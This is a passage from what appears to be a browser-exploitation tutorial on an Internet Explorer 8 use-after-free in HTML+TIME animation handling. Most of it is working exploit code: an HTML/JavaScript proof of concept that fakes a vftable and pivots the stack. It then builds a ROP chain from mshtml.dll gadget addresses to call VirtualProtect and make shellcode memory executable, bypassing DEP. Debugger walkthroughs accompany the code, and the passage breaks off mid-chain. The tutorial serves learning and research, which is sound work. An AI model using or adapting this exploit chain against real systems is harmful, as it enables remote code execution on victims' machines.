So what happened here is that the address of our heap chunk, which reclaimed the freed chunk, was loaded into ECX. The value in ECX points to our heap chunk. Our heap chunk is 0x68 bytes and consists of nothing but pointers: the 1st is a pointer to the fake virtual function table, and the 2nd onwards are pointers to the string “vftable”. This can be seen in the image below (in WinDbg, poi() will dereference what is within the parentheses and display it).
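
Spelled out, the reclaimed chunk that ECX points to looks roughly like this (offsets only):

// Reclaimed 0x68-byte chunk (26 DWORDs)
// +0x00 -> pointer to our fake vftable (the long unicode string built above)
// +0x04 -> pointer to the string "vftable"
// +0x08 -> pointer to the string "vftable"
// ...and so on, through...
// +0x64 -> pointer to the string "vftable"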

The value pointed to by ECX, which is the pointer to our fake vftable, is then also placed in EAX.

The value located at an offset of 0x70 from EAX is then placed into the EDX register. This value is then called.

As we can see, this is 42424242, which is the target entry from our fake vftable! We have now successfully created our exploit primitive. Since we control EAX, we can begin a ROP chain by exchanging the EAX and ESP registers to obtain stack control.

I Mean, Come On, Did You Expect Me To Skip A Chance To Write My Own ROP Chain?

First off, before we start, it is well known IE8 contains some modules that do not depend on ASLR. For these purposes, this exploit will not take into consideration ASLR, but I hope that true ASLR bypasses through information leaks are something that I can take advantage of in the future, and I would love to document those findings in a blog post. However, for now, we must learn to walk before we can run. At the current state, I am just learning about browser exploitation, and I am not there yet. However, I hope to be soon!

It is a well known fact that, while leveraging the Java Runtime Environment, version 1.6 to be specific, an older version of MSVCR71.dll gets loaded into Internet Explorer 8, which is not compiled with ASLR. We could just leverage this DLL for our purposes. However, since there is already much documentation on this, we will go ahead and just disable ASLR system wide and construct our own ROP chain, to bypass DEP, with another library that doesn’t have an “automated ROP chain”. Note again, this is the first post in a series where I hope to increasingly make things more modern. However, I am in my infancy in regards to learning browser exploitation, so we are going to start off by walking instead of running. This article describes how you can disable ASLR system wide.

Great. From here, we can leverage the rp++ utility to enumerate ROP gadgets for a given DLL. Let’s search in mshtml.dll, as we are already familiar with it!

To start, we know that the address of our fake virtual function table is in EAX. We are not limited to a certain size here, as this table is pointed to by the first of the 26 DWORDS (for a total of 0x68, or 104 bytes) that fill up the freed heap chunk. Because of this, we can exchange the EAX register (which we control) with the ESP register. This will give us stack control and allow us to start forging a ROP chain.

Parsing the ROP gadget output from rp++, we can see that a nice ROP gadget exists.

Let’s update our POC with this ROP gadget, in place of the former 42424242 DWORD that served as our fake virtual function.

<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<meta><?IMPORT namespace="t" implementation="#default#time2"></meta>
  <script>

    window.onload = function() {

      // Create the fake vftable (29 DWORDs of fake "functions", spanning offsets 0x00 through 0x70)
      vftable = "\u4141\u4141";

      for (i=0; i < 0x70/4; i++)
      {
        // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtual function being fetched at [eax+0x70]
        // which is now controlled by our own chunk
        if (i == 0x70/4-1)
        {
          vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
        }
        else
        {
          vftable+= unescape("\u4141\u4141");
        }
      }

      // This creates an array of strings that get pointers created to them by the values property of t:ANIMATECOLOR (so technically these will become an array of pointers to strings)
      // Just make sure that the strings are semicolon separated (the first element, which is our fake vftable, doesn't need to be prepended with a semicolon)
      // The first pointer in this array of pointers is a pointer to the fake vftable, constructed with the above for loops. Each ";vftable" string is prepended to the longer 0x70 byte fake vftable, which is the first pointer/DWORD
      for(i=0; i<25; i++)
      {
        vftable += ";vftable";
      }

      // Trigger the UAF
      var x  = document.getElementById("a");
      x.outerText = "";

      /*
      // Create a string that will eventually have 104 non-unicode bytes
      var fillAlloc = "\u4141\u4141";

      // Strings in JavaScript are in unicode
      // \u unescapes characters to make them non-unicode
      // Each string is also appended with a NULL byte
      // We already have 4 bytes from the fillAlloc definition. Appending 100 more bytes, 1 DWORD (4 bytes) at a time, compensating for the last NULL byte
      for (i=0; i < 100/4-1; i++)
      {
        fillAlloc += "\u4242\u4242";
      }

      // Create an array and add it as an element
      // https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/
      // DOM elements can be created with a property set to the payload
      var newElement = document.createElement('img');
      newElement.title = fillAlloc;
      */

      try {
        a = document.getElementById('anim');
        a.values = vftable;
      }
      catch (e) {};

  </script>
    <table>
      <tr>
        <div>
          <span>
            <q id='a'>
              <a>
                <td></td>
              </a>
            </q>
          </span>
        </div>
      </tr>
    </table>
</html>

Let’s (for now) leave WinDbg configured as our postmortem debugger, and see what happens. Running the POC, we can see that the crash ensues, and the instruction pointer is pointing to 41414141.

Great! We can see that we have gained control over EAX by making our virtual function point to a ROP gadget that exchanges EAX into ESP! Recall earlier what was said about our fake vftable. Right now, this table is only 0x70 bytes in size, because we know our vftable from earlier indexed a function from offset 0x70. This doesn’t mean, however, we are limited to 0x70 total bytes. The only limitation we have is how much memory we can allocate to fill the chunk. Remember, this vftable is pointed to by a DWORD, created from the HTML+TIME method to allocate 26 total DWORDS, for a total of 0x68 bytes, or 104 bytes in decimal, which is what we need in order to control the freed allocation.

Knowing this, let’s add some “ROP” gadgets into our POC to outline this concept.

// Create the fake vftable (29 DWORDs of fake "functions", spanning offsets 0x00 through 0x70)
vftable = "\u4141\u4141";

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtual function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else
{
  vftable+= unescape("\u4141\u4141");
}
}

// Begin the ROP chain
rop = "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

Great! We can see that our crash still occurs properly, the instruction pointer is controlled, and we have added to our fake vftable, which is now located on the stack! In terms of exploitation strategy, notice that there still remains a pointer on the stack to our original xchg eax, esp gadget. Because of this, we will need to start our ROP chain after this pointer, since it has already been executed. This means that our ROP chain should start where the 43434343 bytes begin, and the 41414141 bytes can remain as padding/a jump further into the fake vftable.
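
As a quick aside, hand-encoding every gadget as a pair of unicode escapes gets error-prone fast. A small hypothetical helper, not used in this POC and shown here purely as a convenience, could produce the same little-endian string from a 32-bit value:

function d2u(dword)
{
    // Low word first, then high word, so the DWORD lands in memory little-endian
    var low  = dword & 0xFFFF;
    var high = (dword >>> 16) & 0xFFFF;
    return String.fromCharCode(low) + String.fromCharCode(high);
}

// d2u(0x74c7a1ea) produces the same string as unescape("\ua1ea\u74c7")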

It should be noted that from here on out, I had issues setting breakpoints in WinDbg with Internet Explorer processes. This is because Internet Explorer forks many processes, depending on how many tabs you have, and our code, even when opened in the original Internet Explorer tab, will fork another Internet Explorer process. Because of this, we will continue to use WinDbg as our postmortem debugger for the time being, making changes to our ROP chain and then viewing the state of the debugger to see our results. When necessary, we will start from the parent Internet Explorer process, identify the correct child process, and attach WinDbg to it in order to properly analyze our exploit.

We know that we need to change the rest of our fake vftable DWORDS with something that will eventually “jump” over our previously used xchg eax, esp ; ret gadget. To do this, let’s edit how we are constructing our fake vftable.

// Create the fake vftable (29 DWORDs of fake "functions", spanning offsets 0x00 through 0x70)
// Start the table with a ROP gadget that increases ESP (since this fake vftable is now on the stack, we need to climb over these fake entries to hit our ROP chain)
// Otherwise, the old xchg eax, esp ; ret stack pivot gadget will get re-executed
vftable = "\u07be\u74fb";                   // add esp, 0xC ; ret (74fb07be) (mshtml.dll)

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtual function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else if (i == 0x68/4-1)
{
  vftable += unescape("\u07be\u74fb");    // add esp, 0xC ; ret (74fb07be) (mshtml.dll) When execution reaches here, jump over the xchg eax, esp ; ret gadget and into the full ROP chain
}
else
{
  vftable+= unescape("\u7738\u7503");     // ret (75037738) (mshtml.dll) Keep perform returns to increment the stack, until the final add esp, 0xC ; ret is hit
}
}

// ROP chain
rop = "\u9090\u9090";             // Padding for the previous ROP gadget (add esp, 0xC ; ret)

// Our ROP chain begins here
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

What we know so far is that this fake vftable will be loaded on the stack. When this happens, our original xchg eax, esp ; ret gadget will still be there, and we will need a way to make sure we don’t execute it again. The way we are going to do this is to replace our 41414141 bytes with pointers to lone ret instructions, which will walk up the stack until an eventual add esp, 0xC ; ret ROP gadget is hit, which will jump over the xchg eax, esp ; ret gadget and into our final ROP chain!

Rerunning the new POC shows us that program execution has skipped over the virtual function table and into our ROP chain! I will go into detail about the ROP chain, but from here on out there is nothing special about this exploit. Just as my previous blog posts have outlined, constructing a ROP chain from this point on is the same process. For getting started with ROP, please refer to these posts. This post will just walk through the ROP chain constructed for this exploit.

The first of the 8 43434343 DWORDS is in ESP, with the other 7 DWORDS located on the stack.

This is great news. From here, we just have the simple task of developing a 32-bit ROP chain! The first step is to get a stack address loaded into a register, so we can use it to calculate offsets to other locations on the stack. Note that although the stack changes addresses between each instance of a process (usually), this is not a result of ASLR, just a result of memory management.

Looking through mshtml.dll, we can see there are two great candidates to get a stack address into EAX and ECX.

push esp ; pop eax ; ret

mov ecx, eax ; call edx

Notice, however, that the mov ecx, eax instruction ends in a call. We will first pop a gadget that “returns to the stack” into EDX. When the call occurs, a return address will be pushed onto the stack. To compensate for this, and so program execution doesn’t land on this return address, we simply add to ESP to essentially “jump over” it. Here is what this block of the ROP chain looks like.

// Our ROP chain begins here
rop += "\ud937\u74e7";                     // push esp ; pop eax ; ret (74e7d937) (mshtml.dll) Get a stack address into a controllable register
rop += "\u9d55\u74c2";                     // pop edx ; ret (74c29d55) (mshtml.dll) Prepare EDX for COP gadget
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX, which contains a stack address, into ECX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9365\u750c";                     // add esp, 0x18 ; pop ebp ; ret (750c9365) (mshtml.dll) Jump over parameter placeholders into ROP chain

// Parameter placeholders
// The Import Address Table of mshtml.dll has a direct pointer to VirtualProtect 
// 74c21308  77e250ab kernel32!VirtualProtectStub
rop += "\u1308\u74c2";                     // kernel32!VirtualProtectStub IAT pointer
rop += "\u1111\u1111";                     // Fake return address placeholder
rop += "\u2222\u2222";                     // lpAddress (Shellcode address)
rop += "\u3333\u3333";                     // dwSize (Size of shellcode)
rop += "\u4444\u4444";                     // flNewProtect (PAGE_EXECUTE_READWRITE, 0x40)
rop += "\u5555\u5555";                     // lpflOldProtect (Any writable page)

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\u9090\u9090";                     // Compensate for pop ebp instruction from gadget that "jumps" over parameter placeholders
rop += "\u9090\u9090";                     // Start ROP chain

After we get a stack address loaded into EAX and ECX, notice how we have constructed “parameter placeholders” for our eventual call to VirtualProtect, which will mark the stack as RWX so that we can execute our shellcode from there.

Recall that we have control of the stack, and everything within the rop variable is on the stack. The function call itself is also staged on the stack, because we are performing this exploit on a 32-bit system. 32-bit Windows, as you may recall, leverages the __stdcall calling convention by default, which passes function arguments on the stack. For more information on how this ROP method is constructed, you can refer to a previous blog I wrote, which outlines this method.
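
For reference, this is the stack layout we are building toward at the exact moment execution returns into VirtualProtect. It is only a sketch; the concrete values are filled in by the gadgets that follow.

// ESP + 0x00 -> address of kernel32!VirtualProtect (what the final ret returns into)
// ESP + 0x04 -> fake return address -> address of our shellcode
// ESP + 0x08 -> lpAddress           -> address of our shellcode
// ESP + 0x0C -> dwSize              -> size of the shellcode region
// ESP + 0x10 -> flNewProtect        -> 0x40 (PAGE_EXECUTE_READWRITE)
// ESP + 0x14 -> lpflOldProtect      -> any writable address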

After running the updated POC, we can see that we land on the 90909090 bytes, which are marked in the POC above as “Start ROP chain” (the last line of the snippet). Let’s check a few things out to confirm we are getting the expected behavior.

Our ROP chain starts out by saving ESP (at the time) into EAX. This value is then moved into ECX, meaning EAX and ECX both contain addresses that are very close to the stack in its current state. Let’s check the state of the registers, compared to the value of the stack.

As we can see, EAX and ECX contain the same address, and both of these addresses are part of the address space of the current stack! This is great, and we are now on our way. Our goal now will be to leverage the preserved stack addresses, place them in strategic registers, and leverage arbitrary write gadgets to overwrite the stack addresses containing the placeholders with our actual arguments.

As mentioned above, we know that Internet Explorer, when spawned, creates at least two processes. Since our exploit additionally forks another process from Internet Explorer, we are going to work backwards now. Let’s leverage Process Hacker in order to see the process tree when Internet Explorer is spawned.

The processes we have been looking at thus far are the child processes of the original Internet Explorer parent. Notice however, when we run our POC (which is not a complete exploit and still causes a crash), that a third Internet Explorer process is created, even though we are opening this file from the second Internet Explorer process.

This, thus far, has been unbeknownst to us, as we have been leveraging WinDbg in a postmortem fashion. However, we can get around this by simply waiting until the third process is created before attaching our debugger! Each time we have executed the script, we have been given a prompt asking us if we want to allow JavaScript. We will use this as a way to debug the correct process. First, open up Internet Explorer how you usually would. Secondly, before attaching your debugger, open the exploit script in Internet Explorer. Don’t click on “Click here for options…”.

This will create a third process, which will be the last process listed in WinDbg under “System order”.

Note that you do not need to leverage Process Hacker each time to identify the process. Open up the exploit, and don’t accept the prompt yet to execute JavaScript. Open WinDbg, and attach to the very last Internet Explorer process.

Now that we are debugging the correct process, we can actually set some breakpoints to verify everything is intact. Let’s set a breakpoint on the gadget that “jumps” over the parameter placeholders for our ROP chain and execute our POC.

Great! Stepping through the instruction(s), we then finally land into our 90909090 “ROP gadget”, which symbolizes where our “meaningful” ROP chain will start, and we can see we have “jumped” over the parameter placeholders!

From our current execution state, we know that ECX/EAX contain a value near the stack. The first parameter placeholder, which holds a pointer to the IAT entry for kernel32!VirtualProtectStub, is 0x18 bytes away from the value in ECX.

Our first goal will be to take this value, increase it by 0x18, and perform two dereference operations: first dereference the pointer on the stack to obtain the address of the IAT entry, and then dereference that IAT entry to get the address of kernel32!VirtualProtect. This can be seen below.

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\udfee\u74e7";                     // add eax, 0x18 ; ret (74e7dfee) (mshtml.dll) EAX is 0x18 bytes away from the parameter placeholder for VirtualProtect
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX into ECX (EDX still contains our COP gadget)
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the stack pointer offset containing the IAT entry for VirtualProtect
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

The above snippet will take the preserved stack value in EAX and increase it by 0x18 bytes. This means EAX will now hold the stack address of the VirtualProtect parameter placeholder. This value is also copied into ECX by reusing our previous COP gadget. Then, the value in EAX is dereferenced, so EAX holds what the stack address points to (the VirtualProtect IAT entry). That IAT entry is dereferenced in turn, placing the actual address of VirtualProtect in EAX. Finally, ECX, which still holds the stack address of the parameter placeholder, is used with an arbitrary write gadget to overwrite that placeholder with the actual address of VirtualProtect. Let’s set a breakpoint on the previously used add esp, 0x18 gadget used to jump over the parameter placeholders.

Executing the updated POC, we can see EAX now contains the stack address which points to the IAT entry to VirtualProtect.

Stepping through the COP gadget, which loads EAX into ECX, we can see that both registers contain the same value now.

Stepping through, we can see the stack address is dereferenced and placed in EAX, meaning there is now a pointer to VirtualProtect in EAX.

We can dereference the address in EAX again, which is an IAT pointer to VirtualProtect, to load the actual value in EAX. Then, we can overwrite the value on the stack that is our “placeholder” for the VirtualProtect function, using an arbitrary write gadget.

As we can see, the stack address in ECX, which used to hold the parameter placeholder, now holds the actual VirtualProtect address!

The next goal is the next parameter placeholder, which represents a “fake” return address. This return address needs to be the address of our shellcode. Recall that when a function call occurs, a return address is placed on the stack. This address is used by program execution to let the function know where to redirect execution after completing the call. We are leveraging this same concept here, because right after the page in memory that holds our shellcode is marked as RWX, we would like to jump straight to it to start executing.

Let’s first generate some shellcode and store it in a variable called shellcode. Let’s also make our ROP chain a static size of 0x500 bytes, or 0x140 DWORDs.

rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

// Placeholder for the needed size of our ROP chains
for (i=0; i < 0x500/4 - 0x16; i++)
{
rop += "\u9090\u9090";
}

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\u9191\u9191";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\u9191\u9191"
}

This will create several more addresses on the stack, which we can use to get our calculations in order. The rop variable is prototyped for 0x500 total bytes (0x140 DWORDs) worth of gadgets. The 0x16 in the for loop is the number of DWORDs of real gadgets already appended, so the loop emits 0x140 - 0x16 filler DWORDs, keeping rop at a fixed total size. Every time we add a gadget, we need to increase this number by the number of DWORDs added; because the total size stays constant, we can reliably calculate where our shellcode sits on the stack without additional gadgets pushing it further and further down. There are probably better ways to calculate this mathematically, but I am more focused on the concepts behind browser exploitation, not automation.

We know that our shellcode will begin where our 91919191 bytes are. Eventually, we will prepend our final payload with a few NOPs, just to ensure stability. Now that we have our first argument in hand, let’s move on to the fake return address.

We know that the stack address containing the now real first argument for our ROP chain, the address of VirtualProtect, is in ECX. This means the address right after would be the parameter placeholder for our return address.

We can see that if we increase ECX by 4 bytes, we can get the stack address pointing to the return address placeholder into ECX. From there, we can place the location of the shellcode into EAX, and leverage our arbitrary write gadget to overwrite the placeholder parameter with the actual argument we would like to pass, which is the address of where the 91919191 bytes start (a.k.a our shellcode address).

We can leverage the following gadgets to increase ECX.

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder

Don’t forget also to increase the counter used in our earlier for loop by 4 more ROP gadgets (for a total of 0x1a, or 26). It is expected from here on out that this number is increased to compensate for each additional gadget added.

After increasing ECX, we can see that the parameter placeholder’s address for the return address is in ECX.

We also know that the distance between the value in ECX and where our shellcode starts is 0x4dc, or fffffb24 in a negative representation. Recall that if we placed the value 0x4dc on the stack, it would translate to 0x000004dc, which contains NULL bytes, which would break our exploit. Instead, we leverage the negative representation of the value, which contains no NULL bytes, and we will eventually perform a negation operation on it.
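
A hypothetical helper, not part of the POC and shown only to make the arithmetic concrete, can compute such a NULL-free representation:

function negDword(value)
{
    // Two's complement of a 32-bit value; a later neg eax gadget recovers the real value
    return (0x100000000 - value).toString(16);
}

// negDword(0x4dc) -> "fffffb24", which contains no NULL bytes when encoded as a DWORD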

So to start, let’s place into EAX the negative representation of the distance between the current value in ECX (the stack address that points to 11111111, our parameter placeholder for the return address) and our shellcode location (the 91919191 bytes).

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative distance between the current value of ECX (which contains the fake return parameter placeholder on the stack) and the shellcode location into EAX 
rop += "\ufc80\uffff";                     // Negative distance described above (fffffc80)

From here, we will perform the negation operation on EAX, which will place the actual value of 0x4dc into EAX.

rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual distance to the shellcode into EAX

As mentioned above, we know we want to eventually get the stack address which points to our shellcode into EAX. To do so, we will need to actually add the distance to our shellcode to the address of our return parameter placeholder, which currently is only in ECX. There is a nice ROP gadget that can easily add to EAX in mshtml.dll.

add eax, ebx ; ret

In order to add to EAX, we first need to get the distance to our shellcode into EBX. To do this, there is a nice COP gadget available to us.

mov ebx, eax ; call edi

We first are going to start by preparing EDI with a ROP gadget that returns to the stack, as is common with COP.

rop += "\u4d3d\u74c2";                     // pop edi ; ret (74c24d3d) (mshtml.dll) Prepare EDI for a COP gadget 
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget

After, let’s then store the distance to our shellcode into EBX, and compensate for the previous COP gadget’s return to the stack.

rop += "\uc0c8\u7512";                     // mov ebx, eax ; call edi (7512c0c8) (mshtml.dll) Place the distance to the shellcode into EBX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget

We know ECX currently holds the address of the parameter placeholder for our return address, which was the base address used in our calculation of the distance between this placeholder and our shellcode. Let’s move that address into EAX.

rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the return address parameter placeholder stack address back into EAX

Let’s now step through these ROP gadgets in the debugger.

Execution hits EAX first, and the negative distance to our shellcode is loaded into EAX.

After the return to the stack gadget is loaded into EDI, to prepare for the COP gadget, the distance to our shellcode is loaded into EBX. Then, the parameter placeholder address is loaded into EAX.

Since the address of the return address placeholder is in EAX, we can simply add EBX, which holds the distance from that placeholder to our shellcode, to EAX. The result is that EAX now holds the stack address that points to the beginning of our shellcode. Then, we can leverage the previously used arbitrary write gadget to overwrite the return address parameter placeholder, which ECX currently points to, with the address of our shellcode.

rop += "\u5a6c\u74ce";                     // add eax, ebx ; ret (74ce5a6c) (mshtml.dll) Place the address of the shellcode into EAX
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for the fake return address, with the address of the shellcode

We can see that the address of our shellcode is in EAX now.

Leveraging the arbitrary write gadget, we successfully overwrite the return address parameter placeholder on the stack with the actual argument, which is our shellcode!

Perfect! The next parameter is also easy, as the parameter placeholder is located 4 bytes after the return address (lpAddress). Since we already have a great arbitrary write gadget, we can just increase the target location by 4 bytes, so that the stack address of the lpAddress parameter placeholder is placed into ECX. Then, since the address of our shellcode is already in EAX, we can just reuse it!

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpAddress, with the address of the shellcode

As we can see, we have now taken care of the lpAddress parameter.

Next up is the size of our shellcode. We will be specifying 0x401 bytes for our shellcode, as this is more than enough for a shell.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x401 in EAX
rop += "\ufbff\uffff";                     // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual size of the shellcode in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for dwSize, with the size of our shellcode

Similar to last time, we know we cannot place 0x00000401 on the stack, as it contains NULL bytes. Instead, we load the negative representation into EAX and negate it. We also know the dwSize parameter placeholder is 4 bytes after the lpAddress parameter placeholder. We increase ECX, which has the address of the lpAddress placeholder, by 4 bytes to place the dwSize placeholder in ECX. Then, we leverage the same arbitrary write gadget again.
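
As a quick sanity check (a console one-liner, not part of the POC), the encoding works out as expected:

// (0x100000000 - 0x401).toString(16) -> "fffffbff", the DWORD encoded above as "\ufbff\uffff"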

Perfect! We will leverage the exact same routine for the flNewProtect parameter. Instead of the negative representation of 0x401, this time we need to place 0x40 into EAX, which corresponds to the memory constant PAGE_EXECUTE_READWRITE.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x40 (PAGE_EXECUTE_READWRITE) in EAX
rop += "\uffc0\uffff";             // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual memory constraint PAGE_EXECUTE_READWRITE in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for flNewProtect, with PAGE_EXECUTE_READWRITE

Great! The last thing we need to do is overwrite the last parameter placeholder, lpflOldProtect, with any writable address. The .data section of a PE will have memory that is readable and writable. This is where we will go to look for a writable address.

The end of most sections in a PE contains NULL byte padding, and that is our target here, which ends up being the address 7515c010. The image above shows us the .data section begins at mshtml+534000. We can also see it is 889C bytes in size. Knowing this, we can just access .data+8000, which should be near the end of the section.

The routine here is identical to the previous two ROP routines, except there is no negation operation that needs to take place. We simply just need to pop this address into EAX and leverage our same, trusty arbitrary write gadget to overwrite the last parameter placeholder.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place a writable .data section address into EAX for lpflOldPRotect
rop += "\uc010\u7515";             // Value from above (7515c010)
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpflOldProtect, with an address that is writable

Awesome! We have fully instrumented our call to VirtualProtect. All that is left now is to kick off execution by returning into the VirtualProtect address on the stack. To do this, we will just need to load the stack address which points to VirtualProtect into EAX. From there, we can execute an xchg eax, esp ; ret gadget, just like at the beginning of our ROP chain, to return back into the VirtualProtect address, kicking off our function call. We know currently ECX contains the stack address pointing to the last parameter, lpflOldProtect.

We can see that our current value in ECX is 0x14 bytes in front of the VirtualProtect stack address. This means we can leverage several dec ecx ; ret ROP gadgets to bring ECX 0x14 bytes lower. From there, we can then move the ECX register into the EAX register, where we can perform the exchange.

rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
